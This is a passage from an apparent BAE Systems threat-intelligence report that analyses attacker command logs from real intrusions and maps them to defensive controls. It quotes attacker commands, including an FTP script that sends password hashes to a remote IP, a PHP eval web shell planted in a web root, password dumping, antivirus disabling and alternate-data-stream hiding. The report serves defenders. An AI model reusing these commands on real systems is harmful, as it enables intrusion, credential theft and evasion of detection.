In Figure 7 we can see the attacker:

• viewing the NetInstall directory

dir “C:\Program Files\NetInst”

• viewing the contents of the configuration file within the same directory

type “C:\Program Files\NetInst\Lc1Fi12k.cfg”

• copying the executable associated with the NetInstall process

copy “C:\Program Files\NetInst\NiAiServ.exe”

The file is then uploaded using a custom tool ‘htpf.exe’, which sends files using an HTTP PUT, to a remote server. It is likely that this is done with the aim of subverting (i.e. adding malicious code to, or altering) the process either late in the same attack or in future attacks.

4.1.5 STOPPING AVWe observed the attackers nullifying existing defences on the machine manually. It is common for popular malware families such as ZeuS to attempt to prevent AV services from updating, or attempt to disable them entirely in order to prevent future detection. In the case of espionage malware, such measures are not undertaken automatically and instead are undertaken manually by the attacker. This is because, as mentioned previously, many attackers do not build in automated functionality so that their malware is lightweight and hard to detect.

First the attacker lists the tasks running on the machine using the inbuilt Windows function ‘tasklist’. Viewing the results of this the attacker was able to identify the process associated with the AV running on the machine. We believe the attacker must have listed all services running in command 14 (which is missing), because in the next command the attackers runs the command ‘sc qc’, which displays detailed information about a process running, including the binary files responsible for the service and its location.

They also identify another key process linked to the Symantec AV and focus their attention on ‘Rtvscan.exe’, responsible for the real time scanning aspect of the service. In order to prevent the process from running the attackers first rename the process to ‘sed.exe’. Directly afterwards they are observed stopping “Symantec Antivirus”. By altering the executable associated with the AV, the attacker ensures that when the process next attempts to start up it will be unable to find the correct file.

Disabling AV measures on the asset gives the attacker more freedom to download tools which may be picked up by conventional AV vendors, and reduces the chances of the attack being detected in the future.

Page 23: PIANOS: Protecting Information About Networks The Organisation and It's Systems

21 BAE Systems Applied Intelligence

4.1.6 THEFT OF E-MAIL DATAIn the sequence of commands in Figure 9 we can see the attacker download and utilise a tool with the filename ‘EXMRead.exe’

The tool is downloaded from a compromised webserver and saved in the System32 directory. EXMRead.exe is a command line tool designed for reading e-mails (Exchange mail reader) and after identifying a mail server the tool is used. Commands 11 and 12 are missing from our logs, but it is believed the process is run in one of these commands, as in command 13 we can see the attacker checking if the process is running using the command “!tasklist | find “EXMRead”.

Having checked the process is operational, the attacker uses the tool with a series of parameters that includes the user’s IP, associated domain, username and password along with another set of parameters that include organisation and recipient. The credentials used in these commands were stolen on a previous day of the attack.

After looking at the e-mails received by the targeted users, the attackers check the date on which the password for the users will expire, using the command:

!net user {username} /domain | find “Password expires”

This way the attacker will know when they are next required to crack the password of the user and when the password is likely to change. This is so the attacker knows how long they have access to the account before they will need to dump and crack the passwords again. This activity shows evidence of planning ahead for later on in the attack.

4.1.7 COLLECTING PASSWORDSOne of the key reconnaissance actions outlined in section 3 was the collection of additional credentials for use in both the current and future attacks. In the following sequence of commands we can see the attacker download a password dumping utility and use it to retrieve credentials:

This set of commands shows the attacker download and then use a tool for dumping e-mails from an exchange server

This command shows the attackers attempting to use a password dumping tool

Figure 9

Figure 10

Page 24: PIANOS: Protecting Information About Networks The Organisation and It's Systems

22 BAE Systems Applied Intelligence

Creation of an FTP script to exfiltrate password hashesFigure 11

The attacker is observed downloading the tool ‘PW62.exe’ from a compromised site and placing it in the help directory, this is the tool ‘pwdump6’7 .After confirming the tool has been downloaded successfully the attacker runs the tool, passing the network share ‘HQINFO1’ as a parameter and saves the results to the text file ‘hash.txt’. Later the attacker can be seen using some credentials, which have presumably been cracked based on the hashes output file, to log into another share ‘\\HQINFO2’.

The name of the compromised account indicates it is likely to be an administrator account, and as such compromising it will be valuable to the attacker, allowing them to move across the network with little trouble.

Later on in the same session we observed the attackers uploading the results of the password hash dumping to a file, and exfiltrating it to a remote server:

The attackers make use of the ‘echo’ command to begin creating a batch file. Whilst we don’t possess the entirety of the commands, we are able to make out the following information being put into the batch script:

ftp 64.15.150.90

[REDACTED]

put a.bin

They then run the FTP script using the inbuilt Windows ‘ftp’ functionality, passing ‘–s:up.txt’ as a parameter, indicating that it should be run as a script.

4.2 CASE STUDY 2: RECONNAISSANCE ON A COMPROMISED WEB SERVER

In August 2013 BAE Systems engaged with a client for a piece of incident response work to investigate a multi-pronged attack. The attackers used the watering hole technique8 to infiltrate endpoints and simultaneously attacked the webservers of the target organisation. The attackers targeted the webservers to check external facing IP addresses for particular URLs to see if they existed so that they could identify any vulnerable services running on the webservers. The attackers successfully identified the webserver was running a poorly configured instance of Tomcat which allowed the attacker to issue commands to the server in the URL field by making HTTP connections to the endpoint using the following format:

http://$destinationIP/console/jsp-info.jsp?cmd=[Command]

An overview of the commands run during the session are shown in timelines below and reveal the order in which operations take place once attackers have gained access. All timestamps associated with commands displayed are in GMT.

Page 25: PIANOS: Protecting Information About Networks The Organisation and It's Systems

23 BAE Systems Applied Intelligence

4.2.1 INITIAL RECONNAISSANCEThe set of commands shown in Figure 12 shows the activity of the attacker after they first realise that they are able to issue commands, the attacker goes through a number of commands which enable them to understand where they are on the network:

A timeline of initial commands issued by the attacker once they have gained access

Descriptions and rationale for commands issued in Figure 12

Figure 12

Table 7

Command What it does Why that’s useful for the attacker

ipconfig /all Displays the full TCP/IP configuration for all adapters

This gives the attacker key information about the way the victim machine interacts with the network, the way the network is configured and IP addresses of key infrastructure machines.

net view This command utilises the legitimate tool ‘net.exe’ located in C:\Windows\System32. When used with the suffix ‘view’ the command returns a list of connected devices.

The attacker uses this list of devices to find more information about those devices in subsequent commands.

ping www.google.com

The command ‘ping’ is used to verify that a device can communicate with the entity entered after the command.

The attacker uses this to check if the web server is able to make outbound web requests.

net start This command utilises the legitimate tool ‘net.exe’ located in C:\Windows\System32. Using the ‘start’ parameter gives a list of services currently running.

By listing the services running the attacker can identify information such as the AV running, services that may be able to be manipulated or may contain valuable data (such as SQL services).

netstat -an This command utilises the legitimate tool ‘netstat.exe’ located in C:\Windows\System32. The utility shows all TCP connections on the window system, listing all listening ports.

This information can be used to identify key IP addresses in network infrastructure such as ports open on devices connected.

dir When a directory is supplied as the argument, or if no argument is supplied this lists the files in the directory along with basic information about the file. If a file is supplied as the argument this command returns basic information about that file.

This information can be used by attackers to identify files of interest.

(Continued)

Page 26: PIANOS: Protecting Information About Networks The Organisation and It's Systems

24 BAE Systems Applied Intelligence

A timeline of subsequent commands issued by the attackerFigure 13

This period of activity takes about 10 minutes, where commands are issued on an infrequent basis, as the attackers take time to read and store the responses.

Using the information gathered from these commands the attackers can begin to plan their next steps.

whoami This command returns the domain on which the current user is logged onto, along with the current username.

This can be used to understand which credentials the attacker’s commands are currently being issued with. This allows the attacker to understand their current privileges.

set This displays the current environment variables that have been set up. This includes information such as the operating system of the machine, the home drive, the logon server, aswell as the domain used for DNS requests.

This information can be used to inform the attackers approach to reconnaissance, for example they may want to dump password hashes from the logon server.

net user This command utilises the legitimate tool ‘net.exe’ located in C:\Windows\System32. With the ‘user’ parameter, this displays a list of all users that have accounts on the local device.

The users presented to the attacker might be used as a means of selecting where they wish to move to laterally especially if users with administrative privileges are named in a conspicuous way.

4.2.2 TESTING CURRENT ABILITYAfter the attacker has reviewed the initial output from the previous commands we observed the attacker perform basic tests to assess current capability:

Page 27: PIANOS: Protecting Information About Networks The Organisation and It's Systems

25 BAE Systems Applied Intelligence

Description and motivations for command issued in Figure 13Table 8

Command What it does Why that’s useful for the attacker

net user administrator

This command utilises the legitimate tool ‘net.exe’ located in C:\Windows\System32 and displays information about the user specified.

The information returned by this command includes fields which are useful for an attacker, including:

‘Workstations allowed’ which indicates whether a user is restricted to a particular machine

‘Password expires’ which indicates if/when the users password will expire

‘Account active’ which indicates if the account can currently be used.

All of which can be used to help the attacker identify which accounts are worth compromising.

hostname Gives the machine name of the device currently in use.

This allows the attacker to know when the machine currently is being referenced when using commands such as net view. Also the name of a device can often give away its purpose, for example “MAILSERVER01”.

net user > C:/ms4w/Apache/htdocs/1.txt

This command utilises the legitimate tool ‘net.exe’ located in C:\Windows\System32, using the ‘user’ parameter, saving the results into a file. This command displays all of the users who have accounts on the local disk.

This shows the users who have accounts on the local disk, the attacker can often identify privileged users based on the usernames, for example (abc_admin). These users can then be targeted during password dumping later on in the attack.

type <filename>

Outputs the content of the file supplied as a parameter to the console.

This allows the attacker to see the results of commands issued.

telnet 133.242.{REDACTED} 53

This command uses the protocol ‘TelNet’ to connect to the remote IP 133.242.{REDACTED} over port 53.

The attacker checks if they are able to Telnet out, if they are able to this would provide a method of communication which is unlikely to be logged. In the incident above, they were unable to use this protocol.

tftp 133.242.{REDACTED} get 1.txt

This command uses the protocol ‘TFTP’. TFTP is a file transfer protocol, and the attacker attempts to use the protocol to upload the file ‘1.txt’

The attacker checks if they are able to use TFTP protocol to transfer files – if successful they can use the protocol to download malware onto the webserver. In the incident above, they were unable to use this protocol.

tasklist Shows a list of processes currently running, along with basic information about the processes.

This enables the attacker to understand services running on the server that they may be able to abuse, for example on a webserver they may look to see versions of SQL running or which version of Apache is running etc.

mysql -h Connects to the MySQL database. The –h command is for specifying the host

calc Runs windows calculator. The attacker is checking if they are able to run an executable.

taskkill /im calc.exe

This kills the task with the image name ‘calc.exe’.

The attackers terminate the calc process, in order to check they are able to kill processes.

net user domain

In this case the attackers are using the ‘net user’ command. The parameter ‘domain’ is a username on the server. This displays detailed information about the user.

This shows key information about accounts that attackers can use to inform their choices in terms of password dumping. Details such as whether the password must be changed, as well as the last logon time can indicate how likely cracked passwords are to be effective.

Page 28: PIANOS: Protecting Information About Networks The Organisation and It's Systems

26 BAE Systems Applied Intelligence

There is a noticeable shift in the commands, from finding out basic information on the environment, to testing capability.

The attacker also tests connectivity, seeing if protocols such as telnet are allowed, over a variety of ports (although only 53 is shown in the graphic, they also tried to connect over telnet on port 80). They tried these ports as they are likely to be configured to allow both inbound and outbound traffic on firewalls as they are necessary for regular browsing.

At 06:54:53 the attacker tests what they can and can’t do, first starting the process ‘calc’ which runs the inbuilt windows calculator, only to kill it a minute later – the attacker proving that they are able to start and stop processes at will. The attacker also uses the command ‘net user’ on a number of accounts. This allows them to view key information about the victims which can be used when they are looking to compromise credentials & elevate their privileges. Extensive use of ‘net’ commands is commonplace during internal network reconnaissance; this is because they are legitimate Windows tools and are:

• difficult to restrict the use of as they are often used benignly,

• hard to log the use of,

• frequently used by system admins.

4.2.3 ADDITIONAL COMMANDSAfter this the attacker checks the version of php running. This is so that later they are able to construct the ‘mapper.php’ script correctly. After this the attacker realises they can easily add additional code to the webserver, which will enable them to mask commands rather than send them in plain text.

Additional commands run by the attacker on the webserver

Description of the commands issued in Figure 14

Figure 14

Table 9

Command What it does Why that’s useful for the attacker

php –v This command shows the version of php currently running on the server.

The attacker is able to write a php file later which is compatible with the version of php running on the server.

dir C:/Ms4w/Apache/htdoc

Lists the contents of the directory supplied as the argument

Attacker is able to see files available in the directory.

type C:/ms4w/Apache/htdocs/log.php

Echoes the content of the file supplied as a parameter to the console.

This displays the content of the log file to the attacker, at which point they probably realise

/c echo ^<?php eval^{$_POST[z])?^><C:\ms4w\Apache\htdocs\mapper.php

Echoes the following “^<?php eval^{$_POST[z])?^> “ into the file “C:\ms4w\Apache\htdocs\mapper.php “

This command creates a new file ‘mapper.php’. The script created allows the attacker to issue commands to the server without putting them in the URL field, meaning future commands are not logged.

mapper.php The attacker is now using the script created in the command above.

Commands sent by the attacker are no longer logged.

Page 29: PIANOS: Protecting Information About Networks The Organisation and It's Systems

27 BAE Systems Applied Intelligence

All of the commands in this section are issued within Windows Powershell. The command issued at 07:40:19 shows the attacker creating a file ‘mapper.php’ in the htdocs file. Files in this folder are typically visible to anyone visiting the webserver from an external IP. In this case we can see the contents of mapper.php are quite simple:

“?php eval^($_POST[z])?”

This simple script allows the attacker to make HTTP POSTs to the server instead of GET requests, where the command is displayed in the URL. At this point our ability to follow the actions of the attacker was removed, as they simply continued the session with repeated HTTP POSTs to the server, the contents of which were not logged.

4.3 CASE STUDY 3: TOOLS USED DURING INTRUSIONS

Across the incident responses and threat intelligence work undertaken by BAE Systems we have identified a number of tools used by attackers which are used to achieve their goals, including network reconnaissance tools. The list includes legitimate tools used by attackers as well as attacker tools, all of which are used to achieve objectives after malware has been deployed.

A table summarising utilities and tools commonly used by attackers during network intrusionsTable 10

Filename Application name

Description Why it’s used Examples

NTLMHash.exe This tool was downloaded during logs acquired as part of the analysis conducted in section 3.2. The tool output NTLM hashes of passwords stored which the attacker later cracked in order to access additional accounts on the victim network.

This was used to dump passwords of higher privileged users, so that these accounts could be used for lateral movement.

pslist This tool was downloaded during logs acquired as part of the analysis conducted in section 3.2. This tool was a legitimate copy of the SysInternals’ tool ‘pslist’ which returns a list of processes currently running along with more detailed information than is available by simply using ‘tasklist’.

This was observed in multiple intrusions by CommentCrew and generally the SysInternals suite seemed to be the attackers preferred toolset for reconnaissance.

By seeing what processes are running attackers can identify:

– Security applications running (such as AV, other host based detection systems)

– Services running that can be abused (DLL Hijacking , binary planting)

– Investigative tools running (such as wireshark etc.)

psloggedon This tool was downloaded during logs acquired as part of the analysis conducted in section 3.2. This tool was a legitimate copy of the SysInternals’ tool psloggedon.

This was observed in multiple intrusions by CommentCrew and generally the SysInternals suite seemed to be the attackers preferred toolset for reconnaissance.

This command can be used to identify the relationship between a device and a user. In the instances we’ve observed this used, it’s typically been to ensure that the attacker does not log onto a machine at the same time as a user who is already logged on, so as to avoid detection.

pwdump6 This tool was downloaded during logs acquired as part of the analysis conducted in section 3.2. The tool is a publically available password dumping utility which can be found online.7

This tool was used for dumping of password hashes.

(Continued)

Page 30: PIANOS: Protecting Information About Networks The Organisation and It's Systems

28 BAE Systems Applied Intelligence

WINRAR or custom versions thereof

This tool was downloaded during logs acquired as part of the analysis conducted in section 3.2. The attacker downloaded a custom version of WINRar which ran on the command line only.

The tool was used to create archives of files, before they were exfiltrated. It is unclear why they used a custom version of WINRar to do this rather than the full version of the tool which offers the same capability. We have also observed the same attackers using a regular copy of the same software.

MSN Messenger client part

This tool was downloaded during logs acquired as part of the analysis conducted in section 3.2. In one session between the attacker and a victim, the attacker was observed downloading a DLL utilised by the legitimate tool MSN messenger. In MSN Messenger, the DLL was used for sending and receiving files, and the attackers used it for the same capability.

By exfiltrating data using MSN messenger, the attackers would be able to blend in to the noise of other network traffic.

Teamviewer Teamviewer9 provides legitimate software for remote desktop capability.

The software can also be abused by attackers and where an organisation has legitimate uses for Teamviewer, misuse of the application can be difficult to spot.

Also, as the software is an off the shelf product it is easy for attackers to use, and offers a large range of functionality.

Csvde.exe This is a legitimate tool which is located on Windows servers in the System32 folder. This is a command line application designed to batch imports and exports into Active Directory, for example creating multiple user accounts in a single command.

Active Directory data contains valuable information such as list of users, user groups/permissions, computers, servers, network shares and many other data fields. This is essentially a map of the estate and often leads to attackers targeting specific machines once this information has been exfiltrated. Often machine hostnames entries have their associated owner listed in the description field in Active Directory, this can help an attacker target individuals.

Example for dumping Active Directory:

csvde.exe –f output.csv

During an incident response we investigated the attacker utilising both of these tools in conjunction: The attacker runs csvde.exe and compresses the output file using WinRAR into the file C:\Windows\System32\c.rar which is assumed to have been exfiltrated.

The attacker then analysed this information to identify the hostname of a senior executive and subsequently accessed their machine using the Windows Task Scheduler shortly after. Once the attacker accessed the senior executive’s machine there was good evidence to suggest their emails were subsequently downloaded and exfiltrated.

type.exe This is a standard Windows executable and when run it prints the contents of a file to the console.

It can also be used to hide files in alternate data streams e.g.

type bad.exe > c:\Windows\System32\notepad.exe:bad.exe

, or can be used when copy is blocked, or to insert the results of a command into a file.

Filename Application name

Description Why it’s used Examples

Page 31: PIANOS: Protecting Information About Networks The Organisation and It's Systems

29 BAE Systems Applied Intelligence

There are a number of well-defined frameworks and methodologies for information security including the soon to be updated ‘ISO/IEC 27001:2005 – Information technology – Security techniques – Information security management systems – Requirements’. Currently there are fewer for cyber security but this is being addressed by standards bodies and many new standards such as ‘PAS 555:2013 Cyber security risk. Governance and management Specification’ will address this area more specifically.

A mature controls framework for cyber defence is published by the Council on CyberSecurity (CCS), the CCS Critical Security Controls10.The framework covers twenty controls that attempt to directly address the risks associated with cyber-attacks. In this section we review the use of these controls to address the latter stages of targeted attacks.

There are also a number of specific tactics and techniques that extend the CCS Critical Security Controls across the spectrum of defensive capabilities that we discuss. We will extend the concepts described in the CCS Critical Security Controls with specific tactics and techniques that have been shown to have value in addressing the latter stages of attacks.

5.1 CATEGORIES OF DEFENSIVE CAPABILITY

There are a large number of controls, tactics and techniques organisations can deploy in order to defeat a cyber adversary or attacker. These can be categorised by the type of capability they offer as has previously been well understood in military information operations doctrine11. The categories of defensive capabilities useful to discuss in the cyber domain include:

5 CONTROLS, TACTICS AND TECHNIQUES

Capability Definition

Detect To discover or discern the existence, presence, or fact of an intrusion by an adversary into your information systems.

Deny To prevent the adversary from accessing and using your critical information, systems, and services.

Disrupt To break or interrupt the flow of information to and from the adversary to your information systems.

Degrade To reduce the effectiveness or efficiency of adversary command and control or communications systems, and information collection efforts.

Organisations can also reduce the target’s worth or value, or reduce the quality of adversary decisions and actions and in so doing degrade the adversary’s priorities and capabilities.

Deceive To cause an adversary to believe what is not true. This can allow opportunities to hide targets, to redirect adversaries to low value or sacrificial systems and to encourage adversaries to expose their priorities and tactics.

Destroy To disable your information systems or communications network such that the adversary can no longer use it to achieve their goals.

The categories that defensive capabilities fall into and a brief description of each categoryTable 11

Page 32: PIANOS: Protecting Information About Networks The Organisation and It's Systems

30 BAE Systems Applied Intelligence

In the past, traditional IT security solutions, such as AV, have focused on internal protection and control relying on Detect and Deny capabilities. These remain critical but are no longer the only capabilities that should be considered by network defenders. The necessary shift in focus from the internal protection and control, to the adversary or attacker has brought other types of capability such as Disrupt, Degrade and Deceive into consideration.

There has been concern about the legality of activities in these categories which has meant that Disrupt, Degrade and Deceive capabilities have been discounted by many organisations. This is because of the nature of cyber-attacks, for example, an attack might involve servers located in many countries – all of which have different laws in the cyber domain. However, whilst some techniques do exist in a legal grey-area, there are some established tactics and techniques for Disrupt, Degrade and Deceive capabilities being deployed by leading cyber security organisations without legal challenge.

5.2 ATTACK & DEFENCE CONTROLS MATRIX

The following table maps the attacker actions described in the ‘Internal network reconnaissance’ section to the defensive capabilities described above to highlight the utility of different controls and specific tactics and techniques in defeating attacks that are in the lateral movement stage of the BAE Systems Kill Chain.

Adversary Objectives Detect Deny Disrupt Degrade Deceive Destroy

Identify key environment information

Log Analysis

Behavioural Analytics

Threat Intelligence

Network Monitoring

Network Filtering

DNS Redirect

Incident Response

Sinkhole Disconnect

Download of additional tools to collect environment information

Software Inventory

Malware Defences

Log Analysis

Network Monitoring

Behavioural Analysis

Software Inventory

Malware Defences

Web Separation

Malware Defences

Incident Response

QoS Limits Honeypot Disconnect

Elevate Privileges to collect environment information

Log Analysis

Account Monitoring

System Lock-Down

Vulnerability Management

Malware Defences

Network Device Lock-Down

Privileged User Management

Incident Response

Honeypot Power Down

Lateral Movement relying on environment information

Account Monitoring

Threat Intelligence

Network Monitoring

System Lock-Down

Network Device Lockdown

Network Filtering

Network Diode

Web Separation

Incident Response

Sinkhole Honeypot Disconnect

Stage environment information for exfiltration

DLP

Behavioural Analytics

Data Classification & Control

DLP

Incident Response

QoS Limits Honeypot Disconnect

Matrix of Network Reconnaissance Objectives against Defensive CapabilitiesTable 12

Page 33: PIANOS: Protecting Information About Networks The Organisation and It's Systems

31 BAE Systems Applied Intelligence

5.3 CONTROLS, TACTICS & TECHNIQUES – DEFINITIONS

The following describes the controls, tactics and techniques identified in the table above. Wherever possible the relationship of these controls to the CCS Critical Security Controls is highlighted.

5.3.1 TAKEN FROM CCS TOP 20 CRITICAL CONTROLS

These security measures are those which directly adhere to the CCS top 20 Critical Security Controls Version 4.110. All sub-controls within each section apply to the measures identified below.

5.3.1.1 Account Monitoring

impersonate legitimate users by exploiting legitimate but inactive user accounts. This control also incorporates the detection of malicious insiders or former employees who attempt to access accounts left behind in a system long after contract expiration.

Account Monitoring is the following CCS Critical Security Control:

• Critical Control 16: Account Monitoring

This control enables organisations to detect attackers abusing accounts. This can include monitoring for accounts which have not been used in a long time, as well as monitoring for ‘Impossible Journeys’ (where the same account is in use in two places at the same time where it couldn’t be) for example.

5.3.1.2 Boundary Defence

Boundary Defence is the control that prevents attackers gaining an initial foothold on the network through use of multi-layered protection mechanisms such as firewalls, proxies and IPS. The control ensures that attention can then be directed only at those attacks which are capable of circumventing boundary defences.

Boundary Defence is the following CCS Critical Security Control:

• Critical Control 13: Boundary Defence

5.3.1.3 Incident Response

Incident Response is the control that provides the resources and processes to manage attacks and responses to attacks. A fast and effective response both limits damage and limits attacker effectiveness.

Incident Response is the following CCS Critical Security Control:

• Critical Control 18: Incident Response and Management

This control allows organisations to react appropriately to incidents on their estate, and to minimise the damage resulting from incidents.

5.3.1.4 Malware Defences

Malware Defences is the control that provides detection, prevention and removal of malicious software from the network or environment.

Malware Defences is the following CCS Critical Security Control:

• Critical Control 5: Malware Defences

By ensuring malware defences are in place, organisations can hinder the tools that attackers can use initially, as there is a chance that existing defences will catch tools used. For example, some anti-virus providers will detect password dumping tools, meaning attackers have to take an extra step (i.e. disabling the anti-virus), or use other (less effective) tools.

5.3.1.5 Network Device Lockdown

Page 34: PIANOS: Protecting Information About Networks The Organisation and It's Systems

32 BAE Systems Applied Intelligence

Network Device Lockdown is the control that provides secure configuration and reduced attack surfaces for network devices such as network switches, routers and firewalls.

Network Device Lockdown is the following CCS Critical Security Control:

• Critical Control 10: Secure Configurations for Network Devices such as Firewalls, Routers, and Switches

This control enables organisations to defend against simple malware, for example malware which communicates on obscure TCP ports. By restricting both inbound and outbound connectivity to that which has a business case, organisations can narrow an attackers’ options.

5.3.1.6 Vulnerability Management

Vulnerability Management is the control that monitors, detects, prevents and corrects vulnerabilities in the defended environment.

Vulnerability Management is the following CCS Critical Security Control:

• Critical Control 4: Continuous Vulnerability Assessment and Remediation

By ensuring vulnerabilities are kept in check, organisations can make lateral movement for attackers more difficult.

5.3.1.7 System Lock-Down

System Lock-Down is the control that ensures endpoints, mobile devices and servers are configured to reduce their attack surface.

System Lock-Down is the following CCS Critical Security Control:

• Critical Control 3: Secure Configurations for Hardware and Software on Mobile Devices, Laptop, and Servers

By employing this control organisations can minimise opportunities for an attacker to both attack and to increase privileges once they have attacked.

5.3.1.8 Software Inventory

Software Inventory is the control that manages a list of known and approved software within the organisation. It also provides a whitelist capability which is a simple list of applications that have been allowed for a user by an administrator. When an application tries to execute, it is automatically checked against the list and, if found, allowed to run.

Software Inventory is the following CCS Critical Security Control:

• Critical Control 2: Inventory of Authorised and Unauthorised Software

Keeping and enforcing a software inventory makes it very difficult for attackers to infiltrate, but also makes it difficult for them to use other tools following successful infiltration as it is likely to restrict them to the tools that already exist on the victim machine, hindering their progress.

5.3.1.9 Data Loss Prevention (DLP)

DLP is a solution that inhibits the leaking of critical data by inspecting data in transmission and when moved to portable storage devices and enforcing clear security rules.

DLP is the following CCS Critical Control:

• Critical Control 17: Data Loss Prevention

Using a DLP solution to inspect data being transmitted across internal network boundaries may allow an organisation to detect environment information being staged for exfiltration. This will require customisation of the DLP solution to look for critical environment information such as password hashes or IP addresses.

Page 35: PIANOS: Protecting Information About Networks The Organisation and It's Systems

33 BAE Systems Applied Intelligence

5.3.2 TAKEN FROM CCS TOP 20 CRITICAL CONTROLS SUB CONTROLS

These security measures align with selected sub controls of the CCS top 20 Critical Controls.

5.3.2.1 Data Classification & Control

Data Classification and Control is the control that ensures critical assets are identified and rated and access to those assets is limited to a ‘need to know’ rule.

Data Classification & Control is the following CCS Critical Security Control Sub control:

• Critical Control Sub control 15.2: Establish a multi-level data identification/classification scheme (e.g., a three- or four-tiered scheme with data separated into categories based on the impact of exposure of the data).

By ensuring data is classified appropriately organisations will be able to make it more difficult for attackers to find the data they are looking for, increasing the amount of reconnaissance they must undertake.

5.3.2.2 DNS Redirect

DNS Redirect is a tactic that replaces Domain Name Service Internet Protocol address records for key attacker infrastructure with IP address records for systems controlled by the defender. This denies remote command and control capabilities to the attacker.

DNS Redirect corresponds to the following CCS Critical Security Control Sub controls:

• Critical Control Sub control 19.3: Visibility/Attribution: Deploy domain name systems (DNS) in a hierarchical, structured fashion, with all internal network client machines configured to send requests to intranet DNS servers, not to DNS servers located on the Internet. These internal DNS servers should be configured to forward requests they cannot resolve to DNS servers located on a protected DMZ. These DMZ servers, in turn, should be the only DNS servers allowed to send requests to the Internet.

• Critical Control Sub control 5.15: Enable domain name system (DNS) query logging to detect hostname lookup for known malicious C2 domains

Having the ability to disable an attackers’ ability to communicate with victim machines is crucial, by employing DNS redirect tactics organisations are able to react quickly. Note that this responsive measure should only be used when a live security incident is wholly understood.

5.3.2.3 Log Analysis

Log Analysis is the control that collects normalises and analyses system and network logs for security events. This provides a measure of situational awareness both of current attacks and for analysing the events from a historical attack.

Log Analysis is the following CCS Critical Security Control Sub control:

• Critical Control Sub control 14.10: Deploy an SIEM (security incident management/security event management) or log analytic tools for log aggregation and consolidation from multiple machines and for log correlation and analysis. Using the SIEM tool, system administrators and security personnel should devise profiles of common events from given systems so that they can tune detection to focus on unusual activity, avoid false positives, more rapidly identify anomalies, and prevent overwhelming analysts with insignificant alerts.

Log analysis will allow for the detection of most actions that take place during internal network reconnaissance.

5.3.2.4 Network Filtering

Network Filtering is the control that enforces that only legitimate network traffic is allowed between, from and to business systems. The legitimacy of network traffic is determined by the organisation’s security policy and security architecture design.

Network Filtering corresponds to the following CCS Critical Security Control sub controls:

• Critical Control Sub control 10.4: Network filtering technologies employed between networks.

This control should restrict lateral movement of attackers.

Page 36: PIANOS: Protecting Information About Networks The Organisation and It's Systems

34 BAE Systems Applied Intelligence

5.3.2.5 Network Monitoring

Network monitoring is a technique that encompasses the collection of both meta-data and data from network traffic in order to attempt to identify malicious traffic. This data can then be analysed both through Log Analysis and Behavioural Analytics in order to identify security relevant events and patterns of behaviour.

Network Monitoring corresponds to the following CCS Critical Security Controls sub controls:

• Critical Control Sub control 13.2: On DMZ networks, configure monitoring systems (which may be built in to the IDS sensors or deployed as a separate technology) to record at least packet header information, and preferably full packet header and payloads of the traffic destined for or passing through the network border. This traffic should be sent to a properly configured SIEM or log analytics system so that events can be correlated from all devices on the network.

• Critical Control Sub control 13.4: Deploy network-based IDS sensors on Internet and extranet DMZ systems and networks that look for unusual attack mechanisms and detect compromise of these systems. These network-based IDS sensors may detect attacks through the use of signatures, network behaviour analysis, or other mechanisms to analyse traffic.

• Critical Control Sub control 13.14: Deploy netflow collection and analysis to DMZ network flows to detect anomalous activity.

• Critical Control Sub control 14.5: Verbosely log all remote access to a network, whether to the DMZ or the internal network (i.e., VPN, dial-up, or other mechanism).

• Critical Control Sub control 14.11: Advanced: Carefully monitor for service creation events. On Windows systems, many attackers use psexec functionality to spread from system to system. Creation of a service is an unusual event and should be monitored closely.

Without this control neither the Log Analysis, nor Behavioural Analysis controls can take place – it is also key for incident response.

5.3.2.6 Privileged User Management

Privileged User Management is the control that strictly limits access to privileged user accounts to a small group of key administrators whose access is handled under change control and closely monitored. Emergency access to critical accounts by unprivileged users or administrators who don’t normally require day to day access of those accounts is allowed by a ‘break-glass’ process that provides both alerts and accounting records that must later be reconciled.

Whilst the control is focussed heavily on Critical Control 12: Controlled Use of Administrative Privileges, the following sub control matches this strongly as well:

• Critical Control Sub control 3.3: Limit administrative privileges to very few users who have both the knowledge necessary to administer the operating system and a business need to modify the configuration of the underlying operating system. This will help prevent installation of unauthorised software and other abuses of administrator privileges.

As discussed in the case studies, one of the primary goals of attackers is to elevate their privileges on victim networks; by managing the users who have privileged access organisations can make it more difficult for attackers to do this.

5.3.3 SPECIALIST TACTICS AND TECHNIQUESThese security measures do not map directly to the CCS top 20 critical controls or their sub controls, but there is occasionally some overlap. These measures extend and improve upon the existing CCS controls, by offering specific measures or capabilities that organisations should invest in to defend their networks.

5.3.3.1 Web Separation

Web Separation is a technique where the Internet web browser is separated from the user desktop environment, often by the use of virtualisation and remote desktop tools and is itself hosted in a demilitarised zone.

This is commonly deployed with a Data Import / Export Gateway in order to allow Internet based files to be imported to the defended environment.

Web Separation is an extension of the following CCS Critical Security Controls sub controls:

Page 37: PIANOS: Protecting Information About Networks The Organisation and It's Systems

35 BAE Systems Applied Intelligence

• Critical Control Sub control 13.10: To limit access by an insider or malware spreading on an internal network, devise internal network segmentation schemes to limit traffic to only those services needed for business use across the organization’s internal network.

• Critical Control Sub control 19.1: Design the network using a minimum of a three-tier architecture (DMZ, middleware, and private network). Any system accessible from the Internet should be on the DMZ, but DMZ systems should never contain sensitive data. Any system with sensitive data should reside on the private network and never be directly accessible from the Internet. DMZ systems should communicate with private network systems through an application proxy residing on the middleware tier.

This control makes it very difficult for attackers to find the files they are looking for. Typically the network architecture employed in conjunction with such a solution means that attackers are essentially placed on their own ‘mini network’ making it very difficult for them to achieve any of their objectives.

5.3.3.2 Behavioural Analytics

Behavioural Analytics is the application of big data and data mining techniques to identify suspicious patterns of behaviour from network traffic and endpoint activity.

Behavioural Analytics is a technique that is an extension of the following CCS Critical Security Controls:

• Critical Control 5: Malware Defences

• Critical Control 14: Maintenance, Monitoring, and Analysis of Audit Logs

• Critical Control 16: Account Monitoring and Control

Much like log analysis, Behavioural Analytics empowers organisations to detect threats throughout the Kill Chain. Once an organisation is compromised, our experience informs us that Behavioural Analytics have the best chance of any controls listed of detecting targeted attacks.

5.3.3.3 Honeypot

Honeypot is a technique where a deliberately vulnerable system is created in order to encourage an attacker to attack it. This allows the defender to spot when an attack is underway and to learn from the tactics and the tools of the attacker in order to identify the attacker elsewhere in the network or environment.

Honeypot is a technique that is an extension of the following CCS Critical Security Control:

• Critical Control 14: Maintenance, Monitoring, and Analysis of Audit Logs

By employing this technique organisations can waste the resources of attackers, and also can gain an understanding of what resources attackers are targeting, enabling them to construct better defences of those resources.

5.3.3.4 Network Diode

